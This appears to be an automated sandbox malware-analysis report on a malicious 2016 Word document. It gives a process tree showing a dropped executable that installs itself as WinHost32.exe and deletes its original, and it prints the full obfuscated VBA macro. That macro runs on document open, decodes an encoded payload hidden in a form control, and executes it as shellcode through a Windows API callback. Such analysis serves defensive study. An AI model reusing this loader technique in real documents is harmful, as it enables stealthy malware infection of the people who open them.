System Behavior

Analysis Process: WINWORD.EXE PID: 3848 Parent PID: 3412

General

Start time:	15:29:40
Start date:	08/12/2016
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0x2fef0000
File size:	1422168 bytes
MD5 hash:	113371C5AC72FCE072F707C55E7845B9
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: re717.exe PID: 3036 Parent PID: 3848

General

Start time:	15:29:55
Start date:	08/12/2016
Path:	C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe
Imagebase:	0x400000
File size:	37376 bytes
MD5 hash:	18B827BD1ABF15A978C89878BC02B355
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: re717.exe PID: 3048 Parent PID: 3036

General

Start time:	15:29:59
Start date:	08/12/2016
Path:	C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe
Imagebase:	0x400000
File size:	37376 bytes
MD5 hash:	18B827BD1ABF15A978C89878BC02B355
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WinHost32.exe PID: 748 Parent PID: 3048

General

Start time:	15:30:37
Start date:	08/12/2016
Path:	C:\Windows\System32\WinHost32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WinHost32.exe
Imagebase:	0x400000
File size:	37376 bytes
MD5 hash:	18B827BD1ABF15A978C89878BC02B355
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 956 Parent PID: 3048

General

Start time:	15:30:37
Start date:	08/12/2016
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c del C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe >> NUL
Imagebase:	0x4aac0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WinHost32.exe PID: 1940 Parent PID: 748

General

Start time:	15:30:40
Start date:	08/12/2016
Path:	C:\Windows\System32\WinHost32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WinHost32.exe
Imagebase:	0x400000
File size:	37376 bytes
MD5 hash:	18B827BD1ABF15A978C89878BC02B355
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True
9	Dim hydrocharitaceae as String
10	Dim munching as Integer
11	Dim differ as Long
12	Dim titubate as String

Executed Functions

Subroutine Document_Open, APIs: 21, Strings: 9, Number of lines: 16, Relevance: 54.266

APIs	Meta Information
Part of subcall function bloodied@ThisDocument: csociality
Part of subcall function bloodied@ThisDocument: Left
Part of subcall function bloodied@ThisDocument: Mid
Part of subcall function bloodied@ThisDocument: UCase
Part of subcall function bloodied@ThisDocument: Left
Part of subcall function bloodied@ThisDocument: Right
Part of subcall function bloodied@ThisDocument: Left
Part of subcall function bloodied@ThisDocument: Right
Part of subcall function bloodied@ThisDocument: UCase
Part of subcall function bloodied@ThisDocument: Mid
Part of subcall function bloodied@ThisDocument: impissation
Part of subcall function bloodied@ThisDocument: plevna
Part of subcall function bloodied@ThisDocument: Right
Part of subcall function bloodied@ThisDocument: UCase
Part of subcall function bloodied@ThisDocument: LCase
Part of subcall function bloodied@ThisDocument: Mid
Part of subcall function bloodied@ThisDocument: arranger
Part of subcall function bloodied@ThisDocument: Mid
Part of subcall function bloodied@ThisDocument: Right
Part of subcall function bloodied@ThisDocument: LCase
UCase

Strings	Decrypted Strings
"gesneriaceae"
"bountiful"
"mo"
"mot""orized"
"sT"
"mo"
"sT"
"bountiful"
"mot""orized"

Line	Instruction	Meta Information
133	Private Sub Document_Open()
134	Dim casa as Byte	executed
135	Dim omnipresence as Variant
136	aldol = "gesneriaceae"
137	bloodied
138	microtus = 80
139	arcidae = 74
140	If microtus + arcidae < 8 Then
141	microtus = "mo" + UCase("sT")	UCase
142	titubate = "bountiful"
143	eruditeness = "mot" + "orized"
144	Else
145	munching = munching / 280
146	arcidae = 9
147	Endif
148	End Sub

Subroutine bloodied, APIs: 51, Strings: 26, Number of lines: 70, Relevance: 150.57

APIs	Meta Information
csociality
Part of subcall function phonocamptic@andosite: Mid
Part of subcall function phonocamptic@andosite: Asc
Part of subcall function phonocamptic@andosite: CByte
Part of subcall function phonocamptic@andosite: UBound
Part of subcall function phonocamptic@andosite: Mid
Part of subcall function phonocamptic@andosite: LCase
Part of subcall function phonocamptic@andosite: Mid
Part of subcall function phonocamptic@andosite: UCase
Part of subcall function phonocamptic@andosite: Left
Part of subcall function phonocamptic@andosite: UCase
Part of subcall function phonocamptic@andosite: Left
Part of subcall function phonocamptic@andosite: Mid
Part of subcall function phonocamptic@andosite: Left
Part of subcall function phonocamptic@andosite: LCase
Part of subcall function phonocamptic@andosite: UBound
Part of subcall function phonocamptic@andosite: UCase
Part of subcall function phonocamptic@andosite: LCase
Part of subcall function phonocamptic@andosite: Mid
Part of subcall function phonocamptic@andosite: UBound
Left
Mid
UCase
Left
Right
Left
Right
UCase
Mid
kernel32!HeapCreate	kernel32!HeapCreate(262144,0,0)
kernel32!HeapAlloc	kernel32!HeapAlloc(123076608,0,3287)
Right
UCase
Part of subcall function misstanding@ThisDocument: Left
Part of subcall function misstanding@ThisDocument: Right
Part of subcall function misstanding@ThisDocument: Left
Part of subcall function misstanding@ThisDocument: Mid
Part of subcall function misstanding@ThisDocument: Path
Part of subcall function misstanding@ThisDocument: Name
Part of subcall function agural@ThisDocument: methyltestosterone
Part of subcall function agural@ThisDocument: VarPtr
Part of subcall function agural@ThisDocument: LCase
Part of subcall function agural@ThisDocument: UCase
Part of subcall function agural@ThisDocument: LCase
Part of subcall function agural@ThisDocument: methyltestosterone
LCase
Mid
kernel32!EnumResourceTypesW	kernel32!EnumResourceTypesW(0,123080841,"C:/bill_0803708258.doc")
Mid
Right
LCase

Strings	Decrypted Strings
"Pr"
"gleesome"
"piapostasy"
"gleesome"
"piapostasy"
"Pr"
"gavia"
"secularization"
"CS"
"boarmed"
"boarmed"
"CS"
"abrupt"
"touchstone"
"domesticationbe"
"archerfish"
"archerfish"
"cotinus"
"cycling"
"chewy"
"ab"
"advowson"
"AM"
"atrialbebastion"
"atrialbebastion"
"AM"

Line	Instruction	Meta Information
35	Sub bloodied()
36	Dim airhole as Integer	executed
37	Dim anaerobic as Integer
38	bullshot = crappie.csociality.ControlTipText	csociality
39	anemometric = andosite.phonocamptic(bullshot)
40	For eastcentral = 42 To 67
41	dingbat = 67
42	titubate = "gleesome"
43	ectoproct = Left("piapostasy", 2) & "geon" & Mid("stockistholemotherofpearl", 9, 4)	Left Mid
44	ectoproct = UCase("Pr") & Left("ayinitaly", 4) & Right("basedg", 1)	UCase Left Right
45	Next eastcentral
47	saucepan = "gavia"
48	#if Win64 then
49	Dim bigswoln as Integer
50	Dim comatose as LongPtr
51	Dim limewater as Long
52	#else
53	Dim guerrilla as Variant
54	Dim unmaligned as Long
55	Dim comatose as Long
56	#endif
57	besom = 35 - 85 + 3 + 47
58	acidfast = "secularization"
59	acquest = 4096
60	ablepsia = 11
61	While ablepsia < 14
62	alternator = Left("boarmed", 2) + Right("epitheliodiling", 5)	Left Right
63	grosgrain = UCase("CS") & Mid("debrisubstitutenonsmoker", 7, 9)	UCase Mid
64	ablepsia = ablepsia + 1
65	munching = differ - 318
66	Wend
68	loiseleuria = impissation(262144, 0, 0)	kernel32!HeapCreate(262144,0,0) executed
69	comatose = plevna(loiseleuria, 0, 3287)	kernel32!HeapAlloc(123076608,0,3287) executed
70	dividing = "abrupt"
71	Dim dirtyminded as String
72	disclose = "touchstone"
73	peacocks = Right("domesticationbe", 2) + UCase("EfY")	Right UCase
74	dirtyminded = misstanding
75	striated = 3
76	While striated < 8
77	striated = striated + 1
78	titubate = "archerfish"
79	Wend
81	affriction = anemometric
82	biliary = "cotinus"
83	agural comatose, affriction
84	cerambycidae = "cycling"
85	#if Win64 then
86	Dim eggshell as Variant
87	contagion = "chewy"
88	occlusion = LCase("ab") & Mid("afterhourslepscartload", 11, 4) & "y"	LCase Mid
89	gasp = "advowson"
90	mors = 64 - 58 + 125 + 445
91	#else
92	mors = 22 + 484 + 1727
93	#endif
94	Dim di as String
95	Dim stopwatch as Long
96	Dim deathrate as Long
97	deathrate = 0
98	Dim galician as Long
99	galician = comatose + mors
100	oman = arranger(deathrate, galician, dirtyminded)	kernel32!EnumResourceTypesW(0,123080841,"C:/bill_0803708258.doc") executed
101	For tartars = 12 To 54
102	borrower = 54
103	munching = munching - 219
104	cortes = Mid("atrialbebastion", 7, 2) & Right("bassettowitch", 5)	Mid Right
105	cortes = LCase("AM") & LCase("BiveR") & "sion"	LCase
106	Next tartars
108	End Sub

Function agural, APIs: 6, Strings: 6, Number of lines: 21, Relevance: 31.521

APIs	Meta Information
ntdll!RtlMoveMemory	ntdll!RtlMoveMemory(0,3243072,4)
VarPtr
LCase
UCase
LCase
ntdll!RtlMoveMemory	ntdll!RtlMoveMemory(123078608,92766092,3222)

Strings	Decrypted Strings
"Ca"
"Ng"
"er""ecti"
"Ca"
"Ng"
"er""ecti"

Line	Instruction	Meta Information
13	Function agural(miniver, longheaded)
14	Dim burrheaded as String	executed
15	Dim abysm as Byte
16	differ = differ \ 426
17	Dim brownstone as Integer
18	Dim guyana as Long
19	Dim argonaut as Integer
20	Dim furuncle as String
21	Dim gnat as Long
22	methyltestosterone guyana, ByVal VarPtr(longheaded) + 8, 4	ntdll!RtlMoveMemory(0,3243072,4) VarPtr executed
23	munching = differ + 127
24	gnat = miniver
25	For archetype = 26 To 76
26	sciotlo = 76
27	munching = munching \ 236
28	dusky = LCase("Ca") + UCase("tAlatIc")	LCase UCase
29	dusky = "er" & "ecti" & LCase("Ng")	LCase
30	Next archetype
32	methyltestosterone ByVal gnat, ByVal guyana, 17 - 45 + 102 + 3148	ntdll!RtlMoveMemory(123078608,92766092,3222) executed
33	differ = munching - 433
34	End Function

Function misstanding, APIs: 6, Strings: 6, Number of lines: 12, Relevance: 18.012

APIs	Meta Information
Left
Right
Left
Mid
Path
Name

Strings	Decrypted Strings
"fo"
"renomarchantia"
"stpussycat"
"fo"
"renomarchantia"
"stpussycat"

Line	Instruction	Meta Information
110	Function misstanding()
111	Dim aise as Long	executed
112	Dim malfeasance as Long
113	For dekagram = 5 To 56
114	wires = 56
115	titubate = titubate
116	aslant = "fo" & Left("renomarchantia", 4) & Right("whiteliveredon", 2)	Left Right
117	aslant = Left("stpussycat", 2) & Mid("ursidaerucklithodidae", 8, 4)	Left Mid
118	Next dekagram
120	constantan = ThisDocument.Path	Path
121	misstanding = constantan & "/" & ThisDocument.Name	Name
122	End Function

Non-Executed Functions

Subroutine HeaderFooterObject, APIs: 2, Strings: 2, Number of lines: 9, Relevance: 6.009

APIs	Meta Information
wdHeaderFooterPrimary
wdHeaderFooterPrimary

Strings	Decrypted Strings
"<Replace this with your text>"
"<Replace this with your text>"

Line	Instruction	Meta Information
123	Sub HeaderFooterObject()
124	Dim MyText as String
125	MyHeaderText = "<Replace this with your text>"
126	MyFooterText = "<Replace this with your text>"
127	With ActiveDocument.Sections(1)
128	. Headers(wdHeaderFooterPrimary).Range.Text = MyHeaderText	wdHeaderFooterPrimary
129	. Footers(wdHeaderFooterPrimary).Range.Text = MyFooterText	wdHeaderFooterPrimary
130	End With
131	End Sub

Module: andosite

Declaration

Line	Content
1	Attribute VB_Name = "andosite"
2	'ka\xc5\xbeu na Jamajci gand\xc5\xbeu prodaju na kilo
3	'i da okus bude bolji s ka\xc5\xa1ikom Vegete
4	#if Win64 then
5	'Ka\xc5\xbeu ne\xc4\x2021e nikad prestat' glave da nam pune
6	'Sve dok je ovaca ne\xc4\x2021e falit' vune
7	Public Declare PtrSafe Function inserted Lib "kernel32" Alias "CreateEventA"(lpEventAttributes as Any, bManualReset as LongPtr, bInitialState as LongPtr, lpName as String)
8	'Ka\xc5\xbeu nemoj vode vru\xc4\x2021, kod nas propuh ubija
9	'Ka\xc5\xbeu \xc5\xa1to je babi milo to joj se i snilo
10	Public Declare PtrSafe Function impissation Lib "kernel32" Alias "HeapCreate"(ByVal abortive as LongPtr, ByVal gyratory as LongPtr, ByVal soldering as LongPtr) as LongPtr
11	'Sve dok je ovaca ne\xc4\x2021e falit' vune
12	'i da su nas banke uvukle u krizu
13	Public Declare PtrSafe Sub methyltestosterone Lib "ntdll" Alias "RtlMoveMemory"(pDst as Any, pSrc as Any, ByVal ByteLen as LongPtr)
14	'Spale su nam ga\xc4\x2021e, zagrizli smo udice
15	'Od Vatikana do Irana
16	Public Declare PtrSafe Function collinear Lib "gdi32" Alias "SelectObject"(hdc as Any, hgdiobj as LongPtr)
17	'i da su nas banke uvukle u krizu
18	'Ka\xc5\xbeu ne\xc4\x2021e nikad prestat' glave da nam pune
19	Public Declare PtrSafe Function cyclosporeae Lib "kernel32" Alias "GetPriorityClass"(hProcess as LongPtr) as LongPtr
20	'Ka\xc5\xbeu opet Iran pravi nuklearne bombe
21	'Od Vatikana do Irana
22	Public Declare PtrSafe Function substituted Lib "user32" Alias "CopyIcon"(ByVal hIcon as LongPtr) as LongPtr
23	'Ka\xc5\xbeu nemoj vode vru\xc4\x2021, kod nas propuh ubija
24	'Spale su nam ga\xc4\x2021e, zagrizli smo udice
25	Public Declare PtrSafe Function nard Lib "user32" Alias "EndDialog"(ByVal hDlg as LongPtr, nResult as LongPtr) as LongPtr
26	'Ka\xc5\xbeu nemoj vode vru\xc4\x2021, kod nas propuh ubija
27	'ka\xc5\xbeu na Jamajci gand\xc5\xbeu prodaju na kilo
28	Public Declare PtrSafe Function arranger Lib "kernel32" Alias "EnumResourceTypesW"(ByVal hModule as Any, ByVal lpEnumFunc as Any, lParam as Any) as LongPtr
29	'Spale su nam ga\xc4\x2021e, zagrizli smo udice
30	'majmunu je dovoljna banana
31	Public Declare PtrSafe Function plevna Lib "kernel32" Alias "HeapAlloc"(ByVal asterismal as LongPtr, ByVal cholelithiasis as LongPtr, ByVal enveloping as LongPtr) as LongPtr
32	'Od Vatikana do Irana
33	'Mene tjeraju na izbore svake dvije godine
35	'Ka\xc5\xbeu da malu djecu donosi nam roda
36	'Mene tjeraju na izbore svake dvije godine
37	#else
38	'\xc4\x8dudotvorni sapun protiv tvrdokornih mrlja
39	'Mene tjeraju na izbore svake dvije godine
40	Public Declare Sub methyltestosterone Lib "ntdll" Alias "RtlMoveMemory"(pDst as Any, pSrc as Any, ByVal ByteLen as Long)
41	'Ka\xc5\xbeu opet Iran pravi nuklearne bombe
42	'Glave nam u pijesku, neza\xc5\xa1ti\xc4\x2021ene guzice
43	Public Declare Function overseer Lib "gdi32" Alias "SelectObject"(hdc as Any, hgdiobj as Long)
44	'Ka\xc5\xbeu ne\xc4\x2021e nikad prestat' glave da nam pune
45	'majmunu je dovoljna banana
46	Public Declare Function grains Lib "kernel32" Alias "GetPriorityClass"(hProcess as Long) as Long
47	'Ka\xc5\xbeu ne\xc4\x2021e nikad prestat' glave da nam pune
48	'Sve dok je ovaca ne\xc4\x2021e falit' vune
49	Public Declare Function ninnyhammer Lib "user32" Alias "EndDialog"(ByVal hDlg as Long, nResult as Long) as Long
50	'i da smo na vrhu liste po odlivu "mozaka"
51	'\xef\xbb\xbfKa\xc5\xbeu da je Bosna samo dr\xc5\xbeava za ro\xc4\x2018aka
52	Public Declare Function beige Lib "kernel32" Alias "CreateEventA"(lpEventAttributes as Any, bManualReset as Long, bInitialState as Long, lpName as String)
53	'\xef\xbb\xbfKa\xc5\xbeu da je Bosna samo dr\xc5\xbeava za ro\xc4\x2018aka
54	'\xef\xbb\xbfKa\xc5\xbeu da je Bosna samo dr\xc5\xbeava za ro\xc4\x2018aka
55	Public Declare Function arranger Lib "kernel32" Alias "EnumResourceTypesW"(ByVal hModule as Any, ByVal lpEnumFunc as Any, lParam as Any) as Long
56	'\xef\xbb\xbfKa\xc5\xbeu da je Bosna samo dr\xc5\xbeava za ro\xc4\x2018aka
57	'\xef\xbb\xbfKa\xc5\xbeu da je Bosna samo dr\xc5\xbeava za ro\xc4\x2018aka
58	Public Declare Function lyking Lib "user32" Alias "CopyIcon"(hIcon as Long) as Long
59	'Ka\xc5\xbeu da je smak svijeta relativno blizu
60	'igrali smo dobro ali zajeb'o nas sudija
61	Public Declare Function plevna Lib "kernel32" Alias "HeapAlloc"(ByVal reportable as Long, ByVal melanosis as Long, ByVal macrencephaly as Long) as Long
62	'Ka\xc5\xbeu ne\xc4\x2021e nikad prestat' glave da nam pune
63	'igrali smo dobro ali zajeb'o nas sudija
64	Public Declare Function impissation Lib "kernel32" Alias "HeapCreate"(ByVal relentless as Long, ByVal definable as Long, ByVal indefectibility as Long) as Long
65	'i da su nas banke uvukle u krizu
66	'Ka\xc5\xbeu nemoj vode vru\xc4\x2021, kod nas propuh ubija
68	'i da jedino je zdrava fla\xc5\xa1irana voda
69	'a ja glasam za kafanu i marihuanu
70	#endif
71	'Ka\xc5\xbeu ne\xc4\x2021e nikad prestat' glave da nam pune
72	'Ka\xc5\xbeu nemoj vode vru\xc4\x2021, kod nas propuh ubija

Executed Functions

Function phonocamptic, APIs: 19, Strings: 17, Number of lines: 121, Relevance: 54.121

APIs	Meta Information
Mid
Asc
CByte
UBound
Mid
LCase
Mid
UCase
Left
UCase
Left
Mid
Left
LCase
UBound
UCase
LCase
Mid
UBound

Strings	Decrypted Strings
"impregnated"
"impregnated"
"dingcryosteoarthritis"
"semiliteratecacongeries"
"semiliteratecacongeries"
"dingcryosteoarthritis"
"eNDO"
"stazadirachta"
"eNDO"
"stazadirachta"
"di"
"sGui"
"sU"
"di"
"sGui"
"sU"
"coolant"

Line	Instruction	Meta Information
85	Function phonocamptic(compulsory) as String
86	Dim brassiere as Integer	executed
88	Dim recency as Long
89	Dim breakfast as Long
90	Dim orions as Integer
92	Dim farceur(255) as Byte
93	Dim kaffiyeh() as Byte
94	Dim graveunknelld as String
95	Dim abaft as Long
97	Dim givers as Long
98	Dim hyperon(63) as Long
99	Dim burhinidae(63) as Long
100	Dim apnea(63) as Long
101	Dim hind() as Byte
102	munching = munching / 91
104	munching = munching + 461
106	Dim homogenate as Long
107	Dim baptismal as Integer
108	Dim semicolon as Byte
110	grail = 105 + 262039
111	impeccant = 24 + 66 + 166
112	mechanic = 65536
113	Dim idemnity as Byte
115	jewess = 65280
116	defensively = 67 + 26 + 4003
117	fortune = 86 - 22
118	Dim unintermitting as Integer
120	mostaccioli = 128 - 26 - 8 + 257954
121	northeasterly = 16515072
122	rhagoletis = 108 + 16711572
123	glaucium = 59 + 4
124	condiment = 4032
125	sharper = 255
126	Dim sobersides as Variant
127	Dim starchy() as Byte
128	Redim starchy(4295)
129	novelette = 4296
130	For i = 1 To novelette
131	doxy = Mid(compulsory, i, 1)	Mid
132	inarticulately = (Asc(doxy))	Asc
133	starchy(i - 1) = ((CByte(inarticulately)))	CByte
134	Next
135	Dim infernal as Long
136	nationalist = 10
137	While nationalist < 13
138	nationalist = nationalist + 1
139	hydrocharitaceae = "impregnated"
140	Wend
142	evection = UBound(starchy)	UBound
143	laughably = 22
144	For unstressed = 0 To evection
145	starchy(unstressed) = starchy(unstressed) + 2
146	starchy(unstressed) = starchy(unstressed) Xor laughably
147	Next unstressed
148	dequet = 73
149	clementine = 91
150	If dequet + clementine < 4 Then
151	dequet = Mid("semiliteratecacongeries", 13, 2) + LCase("SED")	Mid LCase
152	hydrocharitaceae = titubate
153	ovation = Mid("dingcryosteoarthritis", 5, 3) + UCase("OSuRg") + Left("erycoding", 3)	Mid UCase Left
154	Else
155	munching = differ - 387
156	clementine = 12
157	Endif
159	baptismal = 0
160	paprika = 99 + 23
161	reasonable = 255
162	For homogenate = 0 To reasonable
163	Select Case homogenate
164	Case 65 To 90
165	farceur(homogenate) = homogenate - 65
166	Case 97 To paprika
167	farceur(homogenate) = homogenate - 71
168	Case 48 To 57
169	farceur(homogenate) = homogenate + 4
170	Case 43
171	farceur(homogenate) = 62
172	Case 47
173	farceur(homogenate) = 63
174	End Select
175	Next homogenate
176	For homogenate = 0 To 63
177	burhinidae(homogenate) = homogenate * fortune
178	hyperon(homogenate) = homogenate * defensively
179	apnea(homogenate) = homogenate * grail
180	Next homogenate
181	For litteraire = 13 To 55
182	deformed = 55
183	differ = differ \ 476
184	stocks = UCase("eNDO") + Left("parasimany", 6) + Mid("chemakuantegrains", 10, 2)	UCase Left Mid
185	stocks = Left("stazadirachta", 2) & LCase("RAIn")	Left LCase
186	Next litteraire
188	kaffiyeh = starchy
189	crax = 4
190	Redim hind((((UBound(kaffiyeh) + 1) \ crax) * 3) - 1)	UBound
191	isochronism = 72
192	negotiate = 91
193	If isochronism + negotiate < 28 Then
194	isochronism = "di" + UCase("sGui") + "sement"	UCase
195	munching = munching And 326
196	barbital = LCase("sU") & Mid("cholerberousblackamoor", 7, 6)	LCase Mid
197	Else
198	munching = differ \ 409
199	negotiate = 38
200	Endif
202	achillea = 3
203	titubate = "coolant"
205	hydrocharitaceae = titubate
207	gorgonzola = achillea + 1
208	For breakfast = 0 To UBound(kaffiyeh) Step gorgonzola	UBound
209	mentioning = kaffiyeh(breakfast)
210	givers = apnea(farceur(mentioning)) + hyperon(farceur(kaffiyeh(breakfast + 1))) + burhinidae(farceur(kaffiyeh(breakfast + 2))) + farceur(kaffiyeh(breakfast + achillea))
212	homogenate = mercenaria(givers, rhagoletis)
213	hind(recency) = cynoglossidae(homogenate, mechanic)
214	homogenate = mercenaria(givers, jewess)
215	hind(recency + 1) = cynoglossidae(homogenate, impeccant)
216	hind(recency + 2) = mercenaria(givers, sharper)
217	recency = recency + 3
218	Next breakfast	UBound
219	phonocamptic = hind
220	End Function

Function cynoglossidae, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
79	Function cynoglossidae(curdling, dropout)
80	cynoglossidae = curdling \ dropout	executed
81	End Function

Function mercenaria, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
82	Function mercenaria(anaphrodisia, foulard)
83	mercenaria = anaphrodisia And foulard	executed
84	End Function

Non-Executed Functions

Subroutine sbHideASheet, APIs: 1, Strings: 1, Number of lines: 5, Relevance: 3.005

APIs	Meta Information
Visible

Strings	Decrypted Strings
"Sheet2"

Line	Instruction	Meta Information
73	Sub sbHideASheet()
74	Sheet2.Visible = False	Visible
75	'OR You can mention the Sheet name
76	Sheets("Sheet2").Visible = True
77	End Sub

Module: crappie

Declaration

Line	Content
1	Attribute VB_Name = "crappie"
2	Attribute VB_Base = "0{9AD81DE8-62E1-4795-AE66-E0FE682BA917}{5B5AFF87-D297-46C7-8183-E8213D3D5C4C}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Classification

Analysis Advice

Signature Overview

Software Vulnerabilities:

Networking:

Boot Survival:

Persistence and Installation Behavior:

Data Obfuscation:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static OLE Info

General

OLE File

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 8470

General

VBA Code with Deobfuscations

VBA Code

VBA File Name: andosite.bas, Stream Size: 16341

General

VBA Code with Deobfuscations

VBA Code

VBA File Name: crappie.frm, Stream Size: 1158

General

VBA Code with Deobfuscations

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 144

General

Stream Path: \x5DocumentSummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096

General

Stream Path: 1Table, File Type: FoxPro FPT, blocks size 256, next free block index 2248281856, Stream Size: 4096

General

Stream Path: Data, File Type: data, Stream Size: 50523

General

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 528

General

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 92

General

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5887

General

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 843

General

Stream Path: Macros/crappie/\x1CompObj, File Type: data, Stream Size: 97

General

Stream Path: Macros/crappie/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 312

General

Stream Path: Macros/crappie/f, File Type: data, Stream Size: 9176